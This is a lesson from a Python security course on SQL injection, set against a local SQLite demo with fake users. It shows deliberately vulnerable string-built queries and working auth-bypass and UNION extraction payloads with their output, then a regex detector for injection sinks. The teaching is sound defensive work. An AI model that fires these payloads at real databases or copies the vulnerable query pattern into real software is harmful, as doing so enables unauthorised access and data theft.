PY-L8-30 · A03 — SQL Injection: The Attack

Learning Goals

3 min

By the end of this lesson you can:

Explain the root cause of SQL injection: mixing code and data.
Demonstrate auth bypass and data extraction on a local vulnerable demo.
Recognise the vulnerable code pattern instantly (string-built queries).
Understand the impact — and why the defence (next lesson) is non-negotiable.

⚠️ Local, deliberately-broken demo only

Every exploit here runs against a tiny SQLite-backed app you write and run on your own machine, seeded with fake data. Running these techniques against any system you don't own is a crime (Lesson 19). The point is to understand the mechanism so you can defend it — which you'll do completely in Lesson 31.

Warm-Up · When Data Becomes Code

5 min

Imagine a login query built by gluing strings:

query = "SELECT * FROM users WHERE name = '" + username + "'"

normal:  username = "aisha"
  → SELECT * FROM users WHERE name = 'aisha'           ✓ fine

attack:  username = "' OR '1'='1"
  → SELECT * FROM users WHERE name = '' OR '1'='1'     ✗ always true!

Today's big idea

SQL injection happens when user input is concatenated into a query, so the input can break out of the data context and become part of the SQL code. The classic ' OR '1'='1 turns a login check into "return everything." The root cause — mixing untrusted data with code — is the same root cause as XSS and command injection. Understand it once and you understand a whole family of attacks (and their single defence: keep code and data separate).

New Concept · How the Attack Works

14 min

The vulnerable pattern

import sqlite3
# VULNERABLE — input concatenated/formatted into the SQL string
def login(username, password):
    conn = sqlite3.connect("demo.db")
    query = f"SELECT * FROM users WHERE name = '{username}' AND pw = '{password}'"
    return conn.execute(query).fetchone()       # ← input is now SQL CODE

Any time you see an f-string, +, %, or .format() building a SQL string from input, that's the vulnerability. The database can't tell which parts came from you and which from the attacker.

Attack 1: authentication bypass

# attacker submits username = admin'--   (the -- comments out the rest)
# query becomes:
#   SELECT * FROM users WHERE name = 'admin'--' AND pw = '...'
#                                            ^^^^ everything after -- ignored
# → logs in as admin WITHOUT the password.

The -- starts a SQL comment, discarding the password check entirely. Or ' OR '1'='1 makes the WHERE always true. Either way: login without credentials.

Attack 2: data extraction with UNION

# a search box: SELECT name, email FROM users WHERE name LIKE '%{q}%'
# attacker sets q to:   ' UNION SELECT name, pw FROM users --
# → the query now returns every user's name and PASSWORD HASH.
# UNION lets the attacker append their OWN SELECT onto yours.

UNION SELECT appends attacker-chosen data to the results — letting them dump other tables (passwords, secrets) through an innocent search box. Blind/time-based variants extract data even when results aren't shown.

The impact

auth bypass        log in as anyone, including admin
data theft         dump entire tables (users, passwords, payment data)
data tampering     UPDATE/DELETE arbitrary rows
in severe cases    read/write files, run OS commands (full server takeover)

SQLi is consistently behind some of the largest breaches in history. It's an A03 (Injection) issue, and the cause — untrusted input crossing into the code context — is exactly the trust-boundary failure from Lesson 2.

The fix is a teaser, but it's simple

The complete defence (Lesson 31) is parameterised queries: you send the SQL code and the data to the database separately, so input can never be interpreted as code. Not escaping, not blacklisting — separation. One habit eliminates the entire class.

Worked Example · See It Work (local demo)

12 min

Goal: build a tiny vulnerable login on a local SQLite DB seeded with fake users, and demonstrate auth bypass — to make the mechanism concrete. Your own machine, your own fake data, only.

import sqlite3

# --- set up a local demo DB with FAKE data ---
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (name TEXT, pw TEXT, role TEXT)")
db.executemany("INSERT INTO users VALUES (?, ?, ?)", [
    ("admin", "super-secret-pw", "admin"),
    ("aisha", "aisha-pw", "user"),
])

# --- VULNERABLE login (string-built query) ---
def vulnerable_login(username: str, password: str):
    query = (f"SELECT name, role FROM users "
             f"WHERE name = '{username}' AND pw = '{password}'")
    print("  SQL:", query)
    return db.execute(query).fetchone()

# normal use:
print("normal login:")
print("  result:", vulnerable_login("aisha", "aisha-pw"))     # ('aisha','user')

# ATTACK: bypass auth with no password
print("\ninjection attack (auth bypass):")
print("  result:", vulnerable_login("admin'--", "anything"))  # logs in as admin!

normal login:
  SQL: SELECT name, role FROM users WHERE name = 'aisha' AND pw = 'aisha-pw'
  result: ('aisha', 'user')

injection attack (auth bypass):
  SQL: SELECT name, role FROM users WHERE name = 'admin'--' AND pw = 'anything'
  result: ('admin', 'admin')      ← logged in as admin with NO password

Read the result

Look at the printed SQL: the attacker's admin'-- closed the name string and commented out the entire password check, so the database happily returned the admin row to someone who never knew the password. Nothing was "hacked" in a fancy sense — the input simply became part of the query. This is the whole mechanism, and it's why string-built SQL is one of the most dangerous patterns in programming. Next lesson, the same demo with parameterised queries makes admin'-- just a (failing) literal username — the attack vanishes.

Try It Yourself

13 min

All against your own in-memory/local demo DB or OWASP Juice Shop's SQLi challenge (Lesson 27) — both safe, intentional targets.

01 🟢 Reproduce auth bypass

Build the vulnerable login demo and confirm admin'-- and ' OR '1'='1 both bypass it. Print the resulting SQL each time so you see why.

02 🟡 UNION data extraction

Add a vulnerable search query and use a UNION SELECT to extract data from a column the search wasn't meant to expose (e.g. the pw column). Observe the leak — then appreciate the severity.

Hint

def vuln_search(q):
    return db.execute(
        f"SELECT name FROM users WHERE name LIKE '%{q}%'").fetchall()
# attacker q:  ' UNION SELECT pw FROM users --
# → returns the pw column through the name search

03 🔴 Spot-the-vuln review

Write (or find) five query-building snippets, some safe and some vulnerable. Classify each. The skill: instantly recognising any f-string/+/%/.format() into SQL as a red flag.

Hint

execute(f"... WHERE id = {x}")              ✗ vulnerable (f-string)
execute("... WHERE id = " + str(x))         ✗ vulnerable (concat)
execute("... WHERE id = %s" % x)            ✗ vulnerable (% format)
execute("... WHERE id = ?", (x,))           ✓ safe (parameterised)
execute("... WHERE id = :id", {"id": x})    ✓ safe (named params)

Mini-Challenge · A SQLi Pattern Detector

8 min

Build a static analyzer that scans Python source for likely SQL-injection sinks: a string passed to execute() that's built with an f-string, +, %, or .format(). Report file + line. (Real tools like bandit do this; you're building a mini version.)

Show a sample solution

import re
from pathlib import Path

# execute( with a dynamically-built string (f-string, +, %, .format)
SINK = re.compile(
    r"\.execute(many)?\(\s*(f['\"]|['\"][^'\"]*['\"]\s*[%+]|"
    r"['\"][^'\"]*['\"]\.format)")

def scan(path: str) -> None:
    for n, line in enumerate(Path(path).read_text(encoding="utf-8").splitlines(), 1):
        if SINK.search(line):
            print(f"{path}:{n}: ⚠️ possible SQL injection — "
                  f"use parameterised queries (execute(sql, params))")
            print(f"    {line.strip()}")

scan("app.py")
# Note: heuristic — confirm by hand. The fix is always: separate code & data.

Non-negotiables: flags execute() calls with dynamically-built SQL, reports file:line, recommends parameterisation.

Recap

3 min

SQL injection (A03) happens when user input is glued into a query string, letting input become code — the trust-boundary failure of Lesson 2. ' OR '1'='1 and admin'-- bypass logins; UNION SELECT dumps other tables; severe cases reach the OS. The vulnerable pattern is any f-string/+/%/.format() building SQL — learn to spot it instantly. We demonstrated it only on a local, deliberately-broken demo with fake data, because understanding the mechanism is what lets you defend it. The complete fix — parameterised queries (separate code from data) — is the entire next lesson.

Vocabulary Card

SQL injection: Untrusted input interpreted as SQL code due to string-built queries.
auth bypass: Using injection (e.g. ' OR '1'='1) to log in without credentials.
UNION attack: Appending an attacker-chosen SELECT to leak other tables.
injection sink: The code point where untrusted input reaches an interpreter (here, the DB).

Homework

4 min

On your own local demo (or Juice Shop), reproduce both an auth bypass and a UNION-based data extraction, and capture the resulting SQL to explain why each works. Build the SQLi pattern detector and run it on a project. Write a paragraph: the root cause of injection in one sentence, and why this must be tested only on systems you own/are authorised for.

Sample · root cause + ethics

Root cause (one sentence): SQL injection occurs when untrusted input
is concatenated into a query string, so the database can't distinguish
the developer's CODE from the attacker's DATA — and interprets the
data as code.

Demonstrated on my local in-memory DB (fake users):
  admin'--      → comments out the password check → admin login
  ' UNION SELECT pw FROM users --  → leaks the pw column via search

Why only on my own systems: actually executing these payloads against
a database sends crafted input designed to subvert it — that's
unauthorized access / damage on any system I don't own, a crime under
the CFAA/Computer Misuse Act/etc. (L8-19). I practise on my own demo,
on Juice Shop's SQLi challenge, and on authorised engagements only.

Non-negotiables: reproduced bypass + UNION on a local/authorised target with the SQL shown, the detector, and a clear root-cause + ethics statement.

query = "SELECT * FROM users WHERE name = '" + username + "'" normal: username = "aisha" → SELECT * FROM users WHERE name = 'aisha' ✓ fine attack: username = "' OR '1'='1" → SELECT * FROM users WHERE name = '' OR '1'='1' ✗ always true!

import sqlite3 # VULNERABLE — input concatenated/formatted into the SQL string def login(username, password): conn = sqlite3.connect("demo.db") query = f"SELECT * FROM users WHERE name = '{username}' AND pw = '{password}'" return conn.execute(query).fetchone() # ← input is now SQL CODE

# attacker submits username = admin'-- (the -- comments out the rest) # query becomes: # SELECT * FROM users WHERE name = 'admin'--' AND pw = '...' # ^^^^ everything after -- ignored # → logs in as admin WITHOUT the password.

# a search box: SELECT name, email FROM users WHERE name LIKE '%{q}%' # attacker sets q to: ' UNION SELECT name, pw FROM users -- # → the query now returns every user's name and PASSWORD HASH. # UNION lets the attacker append their OWN SELECT onto yours.

auth bypass log in as anyone, including admin data theft dump entire tables (users, passwords, payment data) data tampering UPDATE/DELETE arbitrary rows in severe cases read/write files, run OS commands (full server takeover)

import sqlite3 # --- set up a local demo DB with FAKE data --- db = sqlite3.connect(":memory:") db.execute("CREATE TABLE users (name TEXT, pw TEXT, role TEXT)") db.executemany("INSERT INTO users VALUES (?, ?, ?)", [ ("admin", "super-secret-pw", "admin"), ("aisha", "aisha-pw", "user"), ]) # --- VULNERABLE login (string-built query) --- def vulnerable_login(username: str, password: str): query = (f"SELECT name, role FROM users " f"WHERE name = '{username}' AND pw = '{password}'") print(" SQL:", query) return db.execute(query).fetchone() # normal use: print("normal login:") print(" result:", vulnerable_login("aisha", "aisha-pw")) # ('aisha','user') # ATTACK: bypass auth with no password print("\ninjection attack (auth bypass):") print(" result:", vulnerable_login("admin'--", "anything")) # logs in as admin!

normal login: SQL: SELECT name, role FROM users WHERE name = 'aisha' AND pw = 'aisha-pw' result: ('aisha', 'user') injection attack (auth bypass): SQL: SELECT name, role FROM users WHERE name = 'admin'--' AND pw = 'anything' result: ('admin', 'admin') ← logged in as admin with NO password

def vuln_search(q): return db.execute( f"SELECT name FROM users WHERE name LIKE '%{q}%'").fetchall() # attacker q: ' UNION SELECT pw FROM users -- # → returns the pw column through the name search

execute(f"... WHERE id = {x}") ✗ vulnerable (f-string) execute("... WHERE id = " + str(x)) ✗ vulnerable (concat) execute("... WHERE id = %s" % x) ✗ vulnerable (% format) execute("... WHERE id = ?", (x,)) ✓ safe (parameterised) execute("... WHERE id = :id", {"id": x}) ✓ safe (named params)

import re from pathlib import Path # execute( with a dynamically-built string (f-string, +, %, .format) SINK = re.compile( r"\.execute(many)?\(\s*(f['\"]|['\"][^'\"]*['\"]\s*[%+]|" r"['\"][^'\"]*['\"]\.format)") def scan(path: str) -> None: for n, line in enumerate(Path(path).read_text(encoding="utf-8").splitlines(), 1): if SINK.search(line): print(f"{path}:{n}: ⚠️ possible SQL injection — " f"use parameterised queries (execute(sql, params))") print(f" {line.strip()}") scan("app.py") # Note: heuristic — confirm by hand. The fix is always: separate code & data.